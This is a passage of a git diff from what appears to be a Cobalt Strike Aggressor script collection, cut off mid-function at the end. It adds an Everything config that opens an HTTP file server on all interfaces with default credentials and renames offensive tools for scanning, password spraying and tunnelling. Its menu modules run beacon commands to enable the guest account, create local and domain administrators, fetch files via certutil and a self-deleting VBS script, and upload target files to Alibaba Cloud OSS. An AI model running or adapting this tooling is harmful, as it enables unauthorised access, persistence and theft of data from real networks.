-selected_inactive_highlighted_foreground_color= -selected_inactive_highlighted_bold= -drop_target_background_color= -drop_target_foreground_color= -drop_target_bold= -drop_target_highlighted_background_color= -drop_target_highlighted_foreground_color= -drop_target_highlighted_bold= -mouseover_background_color= -mouseover_foreground_color= -mouseover_bold= -mouseover_highlighted_background_color= -mouseover_highlighted_foreground_color= -mouseover_highlighted_bold= -mouseover_current_sort_background_color= -mouseover_current_sort_foreground_color= -mouseover_current_sort_bold= -mouseover_current_sort_highlighted_background_color= -mouseover_current_sort_highlighted_foreground_color= -mouseover_current_sort_highlighted_bold= -alternate_row_background_color= -alternate_row_foreground_color= -alternate_row_bold= -alternate_row_highlighted_background_color= -alternate_row_highlighted_foreground_color= -alternate_row_highlighted_bold= -current_sort_alternate_row_background_color= -current_sort_alternate_row_foreground_color= -current_sort_alternate_row_bold= -current_sort_alternate_row_highlighted_background_color= -current_sort_alternate_row_highlighted_foreground_color= -current_sort_alternate_row_highlighted_bold= -hot_background_color= -hot_foreground_color= -hot_bold= -hot_highlighted_background_color= -hot_highlighted_foreground_color= -hot_highlighted_bold= -selected_hot_background_color= -selected_hot_foreground_color= -selected_hot_bold= -selected_hot_highlighted_background_color= -selected_hot_highlighted_foreground_color= -selected_hot_highlighted_bold= -selected_inactive_hot_background_color= -selected_inactive_hot_foreground_color= -selected_inactive_hot_bold= -selected_inactive_hot_highlighted_background_color= -selected_inactive_hot_highlighted_foreground_color= -selected_inactive_hot_highlighted_bold= -thumbnail_mouseover_background_color= -thumbnail_mouseover_foreground_color= -thumbnail_mouseover_bold= -thumbnail_mouseover_highlighted_background_color= -thumbnail_mouseover_highlighted_foreground_color= -thumbnail_mouseover_highlighted_bold= +; Please make sure Everything is not running before modifying this file. +[Everything] +run_as_admin=1 +allow_http_server=1 +allow_etp_server=1 +window_x=198 +window_y=89 +window_wide=785 +window_high=650 +maximized=0 +minimized=0 +fullscreen=0 +ontop=0 +bring_into_view=1 +alpha=255 +match_whole_word=0 +match_path=0 +match_case=0 +match_diacritics=0 +match_regex=0 +view=0 +thumbnail_size=64 +thumbnail_fill=0 +min_thumbnail_size=32 +max_thumbnail_size=256 +medium_thumbnail_size=64 +large_thumbnail_size=128 +extra_large_thumbnail_size=256 +thumbnail_load_size=0 +thumbnail_overlay_icon=1 +shell_max_path=0 +allow_multiple_windows=0 +allow_multiple_instances=0 +run_in_background=1 +show_in_taskbar=1 +show_tray_icon=1 +minimize_to_tray=0 +toggle_window_from_tray_icon=0 +alternate_row_color=0 +show_mouseover=0 +check_for_updates_on_startup=0 +beta_updates=0 +show_highlighted_search_terms=1 +text_size=0 +hide_empty_search_results=0 +clear_selection_on_search=1 +show_focus_on_search=0 +new_window_key=0 +show_window_key=0 +toggle_window_key=0 +language=0 +show_selected_item_in_statusbar=1 +statusbar_selected_item_format= +show_size_in_statusbar=0 +statusbar_size_format=0 +open_folder_command2= +open_file_command2= +open_path_command2= +explore_command2= +explore_path_command2= +window_title_format= +taskbar_notification_title_format= +instance_name= +translucent_selection_rectangle_alpha=70 +min_zoom=-6 +max_zoom=27 +context_menu_type=0 +context_menu_shell_extensions=1 +auto_include_fixed_volumes=1 +auto_include_removable_volumes=0 +auto_remove_offline_ntfs_volumes=1 +auto_remove_moved_ntfs_volumes=1 +auto_include_fixed_refs_volumes=1 +auto_include_removable_refs_volumes=0 +auto_remove_offline_refs_volumes=1 +auto_remove_moved_refs_volumes=1 +find_mount_points_on_removable_volumes=0 +last_export_type=0 +max_threads=0 +reuse_threads=1 +find_subfolders_and_files_max_threads=0 +single_parent_context_menu=0 +auto_size_1=512 +auto_size_2=640 +auto_size_3=768 +auto_size_aspect_ratio_x=9 +auto_size_aspect_ratio_y=7 +auto_size_width_only=0 +auto_size_path_x=1 +auto_size_path_y=2 +sticky_vscroll_bottom=1 +last_options_page=17 +draw_focus_rect=1 +date_format= +time_format= +listview_item_high=0 +single_click_open=0 +underline_icon_titles=0 +icons_only=0 +icon_shell_extensions=1 +auto_scroll_repeat_delay=250 +auto_scroll_repeat_rate=50 +open_many_files_warning_threshold=16 +set_foreground_window_attach_thread_input=0 +debug=0 +debug_log=0 +verbose=0 +lvm=1 +ipc=1 +home_match_case=0 +home_match_whole_word=0 +home_match_path=0 +home_match_diacritics=0 +home_regex=0 +home_search=1 +home_filter=0 +home_sort=0 +home_view=0 +home_index=1 +allow_multiple_windows_from_tray=0 +single_click_tray=0 +close_on_execute=0 +double_click_path=0 +update_display_after_scroll=0 +update_display_after_mask=1 +auto_scroll_view=0 +double_quote_copy_as_path=0 +snap=0 +snaplen=10 +rename_select_filepart_only=0 +rename_move_caret_to_selection_end=0 +rename_nav=0 +search_edit_move_caret_to_selection_end=0 +search_edit_drag_accept_files=0 +select_search_on_mouse_click=1 +focus_search_on_activate=0 +reset_vscroll_on_search=1 +wrap_focus=0 +load_icon_priority=0 +load_thumbnail_priority=0 +load_fileinfo_priority=0 +always_request_all_fileinfo=0 +header_high=0 +hide_on_close=0 +max_hidden_windows=0x00000000 +winmm=0 +menu_escape_amp=1 +menu_folders=0 +menu_folder_separator= +menu_items_per_column=0 +new_inherit=1 +full_row_select=0 +tray_show_command_line= +dpi=96 +ctrl_mouse_wheel_action=1 +allow_open=1 +allow_context_menu=1 +allow_delete=1 +allow_rename=1 +allow_cut=1 +allow_copy=1 +allow_paste=1 +allow_drag_drop=1 +allow_window_message_filter_dragdrop=0 +auto_column_widths=0 +hotkey_explorer_path_search=0 +get_key_name_text=1 +paste_new_line_op=0 +esc_cancel_action=1 +fast_ascii_search=1 +match_path_when_search_contains_path_separator=1 +allow_literal_operators=0 +allow_round_bracket_parenthesis=0 +expand_environment_variables=0 +search_as_you_type=1 +always_update_query_on_search_parameter_change=0 +convert_forward_slash_to_backslash=0 +match_whole_filename_when_using_wildcards=1 +operator_precedence=0 +replace_exact_trailing_star_dot_star_with_star=1 +allow_exclamation_point_not=1 +search_command_prefix= +auto_complete_search_command=1 +double_buffer=1 +search= +show_number_of_results_with_selection=0 +date_descending_first=0 +size_descending_first=0 +size_format=2 +alpha_select=0 +tooltips=1 +listview_tooltips=1 +show_detailed_listview_tooltips=1 +rtl_listview_edit=0 +force_path_ltr_order=1 +force_path_left_align=1 +date_time_order=0 +date_time_align=1 +size_align=3 +invert_layout=0 +update_layout_on_input_language_change=0 +control_shift_action=3 +change_search_rtl_reading_action=3 +invert_layout_action=3 +bookmark_remember_case=1 +bookmark_remember_wholeword=1 +bookmark_remember_path=1 +bookmark_remember_diacritic=1 +bookmark_remember_regex=1 +bookmark_remember_sort=1 +bookmark_remember_view=1 +bookmark_remember_filter=1 +bookmark_remember_index=1 +bookmark_remember_search=1 +bookmark_organize_x=0 +bookmark_organize_y=0 +bookmark_organize_wide=0 +bookmark_organize_high=0 +exclude_list_enabled=1 +exclude_hidden_files_and_folders=0 +exclude_system_files_and_folders=0 +include_only_files= +exclude_files= +db_location= +db_multi_user_filename=0 +db_compress=0 +index_size=1 +fast_size_sort=1 +index_date_created=0 +fast_date_created_sort=0 +index_date_modified=1 +fast_date_modified_sort=1 +index_date_accessed=0 +fast_date_accessed_sort=0 +index_attributes=0 +fast_attributes_sort=0 +index_folder_size=0 +fast_path_sort=1 +fast_extension_sort=0 +extended_information_cache_monitor=1 +db_update_thread_priority=-15 +index_recent_changes=1 +refs_file_id_extd_directory_info_buffer_size=0 +folder_update_thread_mode_background=0 +folder_update_rescan_asap=1 +monitor_thread_mode_background=1 +monitor_retry_delay=30000 +monitor_update_delay=1000 +monitor_pause=0 +usn_record_filter=0xffffffff +cancel_delay=0x000003e8 +allow_ntfs_open_file_by_id=1 +always_update_folder_recent_change=0 +editor_x=0 +editor_y=0 +editor_wide=0 +editor_high=0 +editor_maximized=0 +file_list_relative_paths=0 +rename_x=0 +rename_y=0 +rename_wide=0 +rename_high=0 +rename_match_case=0 +rename_regex=0 +advanced_copy_to_x=0 +advanced_copy_to_y=0 +advanced_copy_to_wide=0 +advanced_copy_to_high=0 +advanced_copy_to_match_case=0 +advanced_copy_to_regex=0 +advanced_move_to_x=0 +advanced_move_to_y=0 +advanced_move_to_wide=0 +advanced_move_to_high=0 +advanced_move_to_match_case=0 +advanced_move_to_regex=0 +advanced_search_x=0 +advanced_search_y=0 +advanced_search_wide=0 +advanced_search_high=0 +advanced_search_page_y_offset=0 +advanced_search_focus_id=0 +advanced_search_warnings=1 +max_recv_size=8388608 +display_full_path_name=0 +size_tiny=10240 +size_small=102400 +size_medium=1048576 +size_large=16777216 +size_huge=134217728 +themed_toolbar=1 +show_copy_name=2 +show_copy_path=2 +show_copy_full_name=2 +show_open_path=2 +show_explore=2 +show_explore_path=2 +copy_path_folder_append_backslash=0 +custom_verb01= +custom_verb02= +custom_verb03= +custom_verb04= +custom_verb05= +custom_verb06= +custom_verb07= +custom_verb08= +custom_verb09= +custom_verb10= +custom_verb11= +custom_verb12= +filters_visible=0 +filters_wide=128 +filters_right_align=1 +filters_tab_stop=0 +filter= +filter_everything_name= +filter_organize_x=0 +filter_organize_y=0 +filter_organize_wide=0 +filter_organize_high=0 +preview_visible=0 +preview_x=640 +preview_tab_stop=0 +preview_mag_filter=0 +preview_min_filter=0 +preview_fill=0 +show_preview_handlers_in_preview_pane=0 +preview_load_size=0 +preview_context=0x00000000 +preview_release_handler_on_clear=0 +sort=Run Count +sort_ascending=0 +always_keep_sort=0 +index=0 +index_file_list= +index_etp_server= +index_link_type=1 +status_bar_visible=1 +select_search_on_focus_mode=1 +select_search_on_set_mode=2 +search_history_enabled=0 +run_history_enabled=1 +search_history_days_to_keep=90 +run_history_days_to_keep=90 +search_history_keep_forever=1 +run_history_keep_forever=1 +search_history_always_suggest=0 +search_history_always_suggest_extend_toolbar=0 +search_history_visible_count_max=12 +search_history_always_suggest_visible_count_max=1 +search_history_show_all_max=256 +search_history_suggestion_max=256 +search_history_show_all_sort=2 +search_history_suggestion_sort=1 +search_history_show_above=0 +search_history_sort=2 +search_history_sort_ascending=0 +search_history_x=0 +search_history_y=0 +search_history_wide=0 +search_history_high=0 +search_history_column_search_wide=208 +search_history_column_search_order=0 +search_history_column_count_wide=128 +search_history_column_count_order=1 +search_history_column_date_wide=128 +search_history_column_date_order=2 +etp_server_enabled=0 +etp_server_bindings= +etp_server_port=21 +etp_server_username= +etp_server_password= +etp_server_welcome_message= +etp_server_log_file_name= +etp_server_logging_enabled=0 +etp_server_log_max_size=4194304 +etp_server_log_delta_size=524288 +etp_server_allow_file_download=1 +ftp_allow_port=1 +ftp_check_data_connection_ip=1 +http_server_enabled=1 +http_server_bindings=0.0.0.0 +http_title_format= +http_server_port=65535 +http_server_username=admin +http_server_password=admin@123 +http_server_home= +http_server_default_page= +http_server_log_file_name= +http_server_logging_enabled=0 +http_server_log_max_size=419430400 +http_server_log_delta_size=524288 +http_server_allow_file_download=1 +http_server_items_per_page=32 +http_server_show_drive_labels=0 +http_server_strings= +http_server_access_control_allow_origin= +service_pipe_name= +name_column_pos=0 +name_column_width=256 +path_column_visible=1 +path_column_pos=1 +path_column_width=256 +size_column_visible=1 +size_column_pos=2 +size_column_width=96 +extension_column_visible=0 +extension_column_pos=3 +extension_column_width=96 +type_column_visible=0 +type_column_pos=4 +type_column_width=96 +last_write_time_column_visible=1 +last_write_time_column_pos=3 +last_write_time_column_width=153 +creation_time_column_visible=0 +creation_time_column_pos=6 +creation_time_column_width=153 +date_accessed_column_visible=0 +date_accessed_column_pos=7 +date_accessed_column_width=153 +attribute_column_visible=0 +attribute_column_pos=8 +attribute_column_width=70 +date_recently_changed_column_visible=0 +date_recently_changed_column_pos=9 +date_recently_changed_column_width=153 +run_count_column_visible=0 +run_count_column_pos=10 +run_count_column_width=96 +date_run_column_visible=0 +date_run_column_pos=11 +date_run_column_width=153 +file_list_filename_column_visible=0 +file_list_filename_column_pos=12 +file_list_filename_column_width=96 +translucent_selection_rectangle_background_color= +translucent_selection_rectangle_border_color= +thumbnail_mouseover_border_color= +preview_background_color= +ntfs_volume_guids="\\\\?\\Volume{2d28957f-5c9e-11ea-88a5-806e6f6e6963}","\\\\?\\Volume{319a4f45-c20d-11ea-8074-806e6f6e6963}" +ntfs_volume_paths="C:","C:" +ntfs_volume_roots="","" +ntfs_volume_includes=1,1 +ntfs_volume_load_recent_changes=0,0 +ntfs_volume_include_onlys="","" +ntfs_volume_monitors=1,1 +refs_volume_guids= +refs_volume_paths= +refs_volume_roots= +refs_volume_includes= +refs_volume_load_recent_changes= +refs_volume_include_onlys= +refs_volume_monitors= +filelists= +filelist_monitor_changes= +folders= +folder_monitor_changes= +folder_buffer_size_list= +folder_rescan_if_full_list= +folder_update_types= +folder_update_days= +folder_update_ats= +folder_update_intervals= +folder_update_interval_types= +exclude_folders= +connect_history_hosts= +connect_history_ports= +connect_history_usernames= +connect_history_link_types= +etp_client_rewrite_patterns= +etp_client_rewrite_substitutions= +file_new_search_window_keys=334 +file_open_file_list_keys=335 +file_close_file_list_keys= +file_close_keys=343,27 +file_export_keys=339 +file_copy_full_name_to_clipboard_keys=9539 +file_copy_path_to_clipboard_keys= +file_set_run_count_keys= +file_create_shortcut_keys= +file_delete_keys=8238 +file_delete_permanently_keys=9262 +file_edit_keys= +file_open_keys=8205 +file_open_selection_and_close_everything_keys= +file_explore_path_keys= +file_open_new_keys= +file_open_path_keys=8461 +file_open_with_keys= +file_open_with_default_verb_keys= +file_play_keys= +file_preview_keys= +file_print_keys= +file_print_to_keys= +file_properties_keys=8717 +file_read_extended_information_keys=8517 +file_rename_keys=8305 +file_run_as_keys= +file_exit_keys=337 +file_copy_name_to_clipboard_keys= +file_open_selection_and_do_not_close_everything_keys= +file_open_most_run_keys= +file_open_last_run_keys= +file_custom_verb_1_keys= +file_custom_verb_2_keys= +file_custom_verb_3_keys= +file_custom_verb_4_keys= +file_custom_verb_5_keys= +file_custom_verb_6_keys= +file_custom_verb_7_keys= +file_custom_verb_8_keys= +file_custom_verb_9_keys= +file_custom_verb_10_keys= +file_custom_verb_11_keys= +file_custom_verb_12_keys= +indexes_folders_rescan_all_now_keys= +indexes_force_rebuild_keys= +edit_cut_keys=8536 +edit_copy_keys=8515,8493 +edit_paste_keys=8534,9261 +edit_select_all_keys=8513 +edit_invert_selection_keys= +edit_copy_to_folder_keys= +edit_move_to_folder_keys= +edit_advanced_advanced_copy_to_folder_keys= +edit_advanced_advanced_move_to_folder_keys= +view_filters_keys= +view_preview_keys=592 +view_status_bar_keys= +view_details_keys=1334 +view_medium_thumbnails_keys=1331 +view_large_thumbnails_keys=1330 +view_extra_large_thumbnails_keys=1329 +view_increase_thumbnail_size_keys=1467 +view_decrease_thumbnail_size_keys=1469 +view_window_size_small_keys=561 +view_window_size_medium_keys=562 +view_window_size_large_keys=563 +view_window_size_auto_fit_keys=564 +view_zoom_zoom_in_keys=443 +view_zoom_zoom_out_keys=445 +view_zoom_reset_keys=304,352 +view_go_to_back_keys=549,166 +view_go_to_forward_keys=551,167 +view_go_to_home_keys=548 +view_go_to_show_all_history_keys=1352,328 +view_sort_by_name_keys=305 +view_sort_by_path_keys=306 +view_sort_by_size_keys=307 +view_sort_by_extension_keys=308 +view_sort_by_type_keys=309 +view_sort_by_date_modified_keys=310 +view_sort_by_date_created_keys=311 +view_sort_by_attributes_keys=312 +view_sort_by_file_list_filename_keys= +view_sort_by_run_count_keys= +view_sort_by_date_run_keys= +view_sort_by_date_recently_changed_keys=313 +view_sort_by_date_accessed_keys= +view_sort_by_ascending_keys= +view_sort_by_descending_keys= +view_refresh_keys=116 +view_fullscreen_keys=122 +view_toggle_ltrrtl_direction_keys= +view_on_top_never_keys= +view_on_top_always_keys= +view_on_top_while_searching_keys= +search_match_case_keys=329 +search_match_whole_word_keys=322 +search_match_path_keys=341 +search_match_diacritics_keys=333 +search_enable_regex_keys=338 +search_advanced_search_keys= +search_add_to_filters_keys= +search_organize_filters_keys=1350 +bookmarks_add_to_bookmarks_keys=324 +bookmarks_organize_bookmarks_keys=1346 +tools_options_keys=336 +tools_console_keys=448 +tools_file_list_editor_keys= +tools_connect_to_etp_server_keys= +tools_disconnect_from_etp_server_keys= +help_everything_help_keys=112 +help_search_syntax_keys= +help_regex_syntax_keys= +help_command_line_options_keys= +help_everything_website_keys= +help_check_for_updates_keys= +help_about_everything_keys=368 +help_donate_keys= +search_edit_focus_search_edit_keys=326,114,580 +search_edit_delete_previous_word_keys=4360 +search_edit_auto_complete_search_keys=4384 +search_edit_show_search_history_keys= +search_edit_show_all_search_history_keys=4646,4648 +result_list_item_up_keys=8230,4134 +result_list_item_down_keys=8232,4136 +result_list_page_up_keys=8225,4129 +result_list_page_down_keys=8226,4130 +result_list_start_of_list_keys=8228 +result_list_end_of_list_keys=8227 +result_list_item_up_extend_keys=9254,5158 +result_list_item_down_extend_keys=9256,5160 +result_list_page_up_extend_keys=9249,5153 +result_list_page_down_extend_keys=9250,5154 +result_list_start_of_list_extend_keys=9252 +result_list_end_of_list_extend_keys=9251 +result_list_focus_up_keys=8486,4390 +result_list_focus_down_keys=8488,4392 +result_list_focus_page_up_keys=8481,4385 +result_list_focus_page_down_keys=8482,4386 +result_list_focus_start_of_list_keys=8484 +result_list_focus_end_of_list_keys=8483 +result_list_focus_up_extend_keys=9510,5414 +result_list_focus_down_extend_keys=9512,5416 +result_list_focus_page_up_extend_keys=9505,5409 +result_list_focus_page_down_extend_keys=9506,5410 +result_list_focus_start_of_list_extend_keys=9508 +result_list_focus_end_of_list_extend_keys=9507 +result_list_focus_result_list_keys= +result_list_focus_highest_run_count_result_keys= +result_list_focus_last_run_result_keys= +result_list_toggle_path_column_keys= +result_list_toggle_size_column_keys= +result_list_toggle_extension_column_keys= +result_list_toggle_type_column_keys= +result_list_toggle_date_modified_column_keys= +result_list_toggle_date_created_column_keys= +result_list_toggle_attributes_column_keys= +result_list_toggle_file_list_filename_column_keys= +result_list_toggle_run_count_column_keys= +result_list_toggle_date_recently_changed_column_keys= +result_list_toggle_date_accessed_column_keys= +result_list_toggle_date_run_column_keys= +result_list_size_all_columns_to_fit_keys=8555 +result_list_size_result_list_to_fit_keys= +result_list_context_menu_keys=9337 +result_list_scroll_left_or_thumbnail_left_keys=8229 +result_list_scroll_right_or_thumbnail_right_keys=8231 +result_list_scroll_page_left_or_thumbnail_focus_left_keys=8485 +result_list_scroll_page_right_or_thumbnail_focus_right_keys=8487 +result_list_left_extend_keys=9253 +result_list_right_extend_keys=9255 +result_list_focus_left_extend_keys=9509 +result_list_focus_right_extend_keys=9511 +result_list_select_focus_keys=8224 +result_list_toggle_focus_selection_keys=8480 +result_list_copy_as_csv_keys= +preview_focus_preview_keys= +result_list_font= +result_list_font_size= +search_edit_font= +search_edit_font_size= +status_bar_font= +status_bar_font_size= +header_font= +header_font_size= +normal_background_color= +normal_foreground_color= +normal_bold= +highlighted_background_color= +highlighted_foreground_color= +highlighted_bold= +current_sort_background_color= +current_sort_foreground_color= +current_sort_bold= +current_sort_highlighted_background_color= +current_sort_highlighted_foreground_color= +current_sort_highlighted_bold= +selected_background_color= +selected_foreground_color= +selected_bold= +selected_highlighted_background_color= +selected_highlighted_foreground_color= +selected_highlighted_bold= +selected_inactive_background_color= +selected_inactive_foreground_color= +selected_inactive_bold= +selected_inactive_highlighted_background_color= +selected_inactive_highlighted_foreground_color= +selected_inactive_highlighted_bold= +drop_target_background_color= +drop_target_foreground_color= +drop_target_bold= +drop_target_highlighted_background_color= +drop_target_highlighted_foreground_color= +drop_target_highlighted_bold= +mouseover_background_color= +mouseover_foreground_color= +mouseover_bold= +mouseover_highlighted_background_color= +mouseover_highlighted_foreground_color= +mouseover_highlighted_bold= +mouseover_current_sort_background_color= +mouseover_current_sort_foreground_color= +mouseover_current_sort_bold= +mouseover_current_sort_highlighted_background_color= +mouseover_current_sort_highlighted_foreground_color= +mouseover_current_sort_highlighted_bold= +alternate_row_background_color= +alternate_row_foreground_color= +alternate_row_bold= +alternate_row_highlighted_background_color= +alternate_row_highlighted_foreground_color= +alternate_row_highlighted_bold= +current_sort_alternate_row_background_color= +current_sort_alternate_row_foreground_color= +current_sort_alternate_row_bold= +current_sort_alternate_row_highlighted_background_color= +current_sort_alternate_row_highlighted_foreground_color= +current_sort_alternate_row_highlighted_bold= +hot_background_color= +hot_foreground_color= +hot_bold= +hot_highlighted_background_color= +hot_highlighted_foreground_color= +hot_highlighted_bold= +selected_hot_background_color= +selected_hot_foreground_color= +selected_hot_bold= +selected_hot_highlighted_background_color= +selected_hot_highlighted_foreground_color= +selected_hot_highlighted_bold= +selected_inactive_hot_background_color= +selected_inactive_hot_foreground_color= +selected_inactive_hot_bold= +selected_inactive_hot_highlighted_background_color= +selected_inactive_hot_highlighted_foreground_color= +selected_inactive_hot_highlighted_bold= +thumbnail_mouseover_background_color= +thumbnail_mouseover_foreground_color= +thumbnail_mouseover_bold= +thumbnail_mouseover_highlighted_background_color= +thumbnail_mouseover_highlighted_foreground_color= +thumbnail_mouseover_highlighted_bold= diff --git a/scripts/Intranet agent/frpcx.exe b/Chinese/scripts/Intranet agent/frpcx.exe similarity index 100% rename from scripts/Intranet agent/frpcx.exe rename to Chinese/scripts/Intranet agent/frpcx.exe diff --git a/scripts/Intranet agent/iox.exe b/Chinese/scripts/Intranet agent/iox.exe similarity index 100% rename from scripts/Intranet agent/iox.exe rename to Chinese/scripts/Intranet agent/iox.exe diff --git a/scripts/Intranet agent/nb.exe b/Chinese/scripts/Intranet agent/nb.exe similarity index 100% rename from scripts/Intranet agent/nb.exe rename to Chinese/scripts/Intranet agent/nb.exe diff --git a/scripts/Intranet agent/npc.exe b/Chinese/scripts/Intranet agent/npc.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Intranet agent/npc.exe rename to Chinese/scripts/Intranet agent/npc.exe diff --git a/scripts/Intranet scanning/SharpSpray.exe b/Chinese/scripts/Intranet scanning/SharpSpray.exe similarity index 100% rename from scripts/Intranet scanning/SharpSpray.exe rename to Chinese/scripts/Intranet scanning/SharpSpray.exe diff --git a/scripts/Intranet scanning/SharpWebScan.exe b/Chinese/scripts/Intranet scanning/SharpWebScan.exe similarity index 100% rename from scripts/Intranet scanning/SharpWebScan.exe rename to Chinese/scripts/Intranet scanning/SharpWebScan.exe diff --git a/scripts/Intranet scanning/TailorScan.exe b/Chinese/scripts/Intranet scanning/TailorScan.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Intranet scanning/TailorScan.exe rename to Chinese/scripts/Intranet scanning/TailorScan.exe diff --git a/scripts/Intranet scanning/fscan.exe b/Chinese/scripts/Intranet scanning/fscan.exe similarity index 100% rename from scripts/Intranet scanning/fscan.exe rename to Chinese/scripts/Intranet scanning/fscan.exe diff --git a/scripts/Locate AD/PVEFindADUser.exe b/Chinese/scripts/Locate AD/PVEFindADUser.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Locate AD/PVEFindADUser.exe rename to Chinese/scripts/Locate AD/PVEFindADUser.exe diff --git a/scripts/Locate AD/PsLoggedon.exe b/Chinese/scripts/Locate AD/PsLoggedon.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Locate AD/PsLoggedon.exe rename to Chinese/scripts/Locate AD/PsLoggedon.exe diff --git a/scripts/Locate AD/netview.exe b/Chinese/scripts/Locate AD/netview.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Locate AD/netview.exe rename to Chinese/scripts/Locate AD/netview.exe diff --git a/scripts/RDP/RegRdpPort.ps1 b/Chinese/scripts/RDP/RegRdpPort.ps1 similarity index 100% rename from scripts/RDP/RegRdpPort.ps1 rename to Chinese/scripts/RDP/RegRdpPort.ps1 diff --git a/English/Z1.cna b/English/Z1.cna new file mode 100644 index 0000000..fce4059 --- /dev/null +++ b/English/Z1.cna @@ -0,0 +1,14 @@ +popup beacon_bottom { + menu "Z1"{ + include(script_resource("modules/Information collection.cna")); + include(script_resource("modules/RDP.cna")) + include(script_resource("modules/Add user.cna")) + include(script_resource("modules/Intranet agent.cna")); + include(script_resource("modules/Grab password.cna")); + include(script_resource("modules/Intranet scanning.cna")); + include(script_resource("modules/Locate AD.cna")); + include(script_resource("modules/Permission retention.cna")); + include(script_resource("modules/Auxiliary.cna")); + include(script_resource("modules/About.cna")); + } +} diff --git a/English/modules/About.cna b/English/modules/About.cna new file mode 100644 index 0000000..e28e40b --- /dev/null +++ b/English/modules/About.cna @@ -0,0 +1,4 @@ +menu "About" { + item("zjun", { url_open("https://www.zjun.info"); }); + item("Project gallery", { url_open("https://github.com/z1un/Z1-AggressorScripts"); }); +} diff --git a/English/modules/Add user.cna b/English/modules/Add user.cna new file mode 100644 index 0000000..17f666a --- /dev/null +++ b/English/modules/Add user.cna @@ -0,0 +1,69 @@ +menu "Adding Users" { + item "Activate the guest user" { + $bid = $1['@']; + bshell($bid, "net user guest /active:yes"); + } + + item "Create an Admin User" { + $bid = $1['@']; + $Dialog = dialog("Add a local administrator user",%(username => "qax$", passwd => "Qianxin@123.", "groups" => "administrators", bid => $bid),&add_localuser); + dialog_description($Dialog, "Add a local administrator user,Pay attention to password complexity in account policies."); + drow_text($Dialog, "username", "username: "); + drow_text($Dialog, "passwd", "passwd: "); + drow_text($Dialog, "groups", "groups(administrators): "); + dbutton_action($Dialog, "Execute"); + dialog_show($Dialog); + } + sub add_localuser{ + local('$Name'); + $Name = $3['username']; + $Pwd = $3['passwd']; + $groups = $3['groups']; + bshell($bid, "net user $Name $Pwd /add && net localgroup $groups $Name /add"); + } + + item "Adding a Domain Admin User"{ + $bid = $1['@']; + $Dialog = dialog("Add Domain Admin",%(username => "qax$",passswd => "Qianxin@123.",bid => $bid),&add_domainuser); + dialog_description($Dialog, "Add a domain administrator user and pay attention to the password complexity in the account policy."); + drow_text($Dialog, "username", "username: "); + drow_text($Dialog, "passswd", "passswd: "); + dbutton_action($Dialog, "Execute"); + dialog_show($Dialog); + } + sub add_domainuser{ + local('$Name'); + $Name = $3['username']; + $Pwd = $3['passswd']; + bshell($bid, "net user $Name $Pwd /add /domain && net group \"Domain Admins\" $Name /add /domain"); + } + + +# item "API add administrator user" { +# $bid = $1['@']; +# btask($bid, "username:admin,password:Admin@123.", ""); +# bexecute($bid, "/scripts/Add user/bof_net_user.o"); +# } + + menu "bypass create admin user"{ + item "Upload NetUser"{ + local('$bid'); + foreach $bid ($1){ + bupload($1, script_resource("/scripts/Add user/NetUser.exe")); + blog($1, "Project gallery:https://github.com/lengjibo/NetUser") + } + } + item "ExecuteNetUser" { + $bid = $1['@']; + $dialog = dialog("NetUser", %(bid => $bid), &NetUser); + dialog_description($dialog, "After execution, an account is automatically added to the administrator group and the program is automatically deleted. User:test123 Pass:Test@#123"); + dbutton_action($dialog, "Execute"); + dialog_show($dialog); + } + sub NetUser{ + bshell($bid, "NetUser.exe"); + } + } + + +} diff --git a/English/modules/Auxiliary.cna b/English/modules/Auxiliary.cna new file mode 100644 index 0000000..581ec90 --- /dev/null +++ b/English/modules/Auxiliary.cna @@ -0,0 +1,65 @@ +menu "Auxiliary module" { + item "certutil download file" { + $bid = $1['@']; + $dialog = dialog("certutil remote download", %(url => "http://xxxx", path => "C:\\Users\\Public\\a", bid => $bid), &certutil); + dialog_description($dialog, "certutil command remote file download."); + drow_text($dialog, "url", "Remote file address: "); + drow_text($dialog, "path", "Local storage location: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub certutil { + $url = $3['url']; + $path = $3['path']; + bshell($bid, "certutil.exe -urlcache -split -f $url $path"); + } + + item "vbs download file" { + $bid = $1['@']; + $dialog = dialog("vbs download file", %(url => "http://xxxx", path => "C:\\Users\\Public\\a", bid => $bid), &vbs); + dialog_description($dialog, "vbs script remote download file, command line parameter, automatic clear vbs download script after execution."); + drow_text($dialog, "url", "remote file address: "); + drow_text($dialog, "path", "local storage file: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub vbs { + $url = $3['url']; + $path = $3['path']; + bupload($bid, script_resource("/scripts/Auxiliary/download.vbs")); + bshell($bid, "download.vbs $url $path"); + bshell($bid, "del /f /s /q download.vbs"); + } + + item "SharpZip (compressed folder)" { + $bid = $1['@']; + $dialog = dialog("SharpZip compressed package file", %(file => "C:\\Users\\Public", path => "C:\\Users\\Public.zip", bid => $bid), &SharpZip); + drow_text($dialog, "file", "file: "); + drow_text($dialog, "path", "path: "); + dialog_description($dialog, "Compress and package directories or files. Project address: https://github.com/uknowsec/SharpZip"); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub SharpZip { + $arg = join('', @("$3['file'] $3['path']")); + bexecute_assembly($bid, script_resource("/scripts/Auxiliary/SharpZip.exe"), $arg); + } + + item "SharpOSS(Upload file)" { + $bid = $1['@']; + $dialog = dialog("SharpOSS", %(bucketName => "", accessKeyId => "", accessKeySecret => "", endpoint => "oss-cn-chengdu.aliyuncs.com", UploadFilePath => "C:\\Users\\Public\\bak.zip", bid => $bid), &SharpOSS); + dialog_description($dialog, "Use aliyun-oss-csharp-sdk to quickly upload target system files to Alibaba Cloud OSS. Project address: https://github.com/uknowsec/SharpOSS"); + drow_text($dialog, "bucketName", "BucketName: "); + drow_text($dialog, "accessKeyId", "AccessKeyId: "); + drow_text($dialog, "accessKeySecret", "AccessKeySecret: "); + drow_text($dialog, "endpoint", "Endpoint: "); + drow_text($dialog, "UploadFilePath", "UploadFilePath: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub SharpOSS { + $bucketName = $3['bucketName']; + $accessKeyId = $3['accessKeyId']; + $accessKeySecret = $3['accessKeySecret']; $endpoint = $3['endpoint']; $UploadFilePath = $3['UploadFilePath']; $arg = join(' ', @($3['bucketName'],$3['accessKeyId'],$3['accessKeySecret'],$3['endpoint'],$3['UploadFilePath'])); bexecute_assembly($bid, 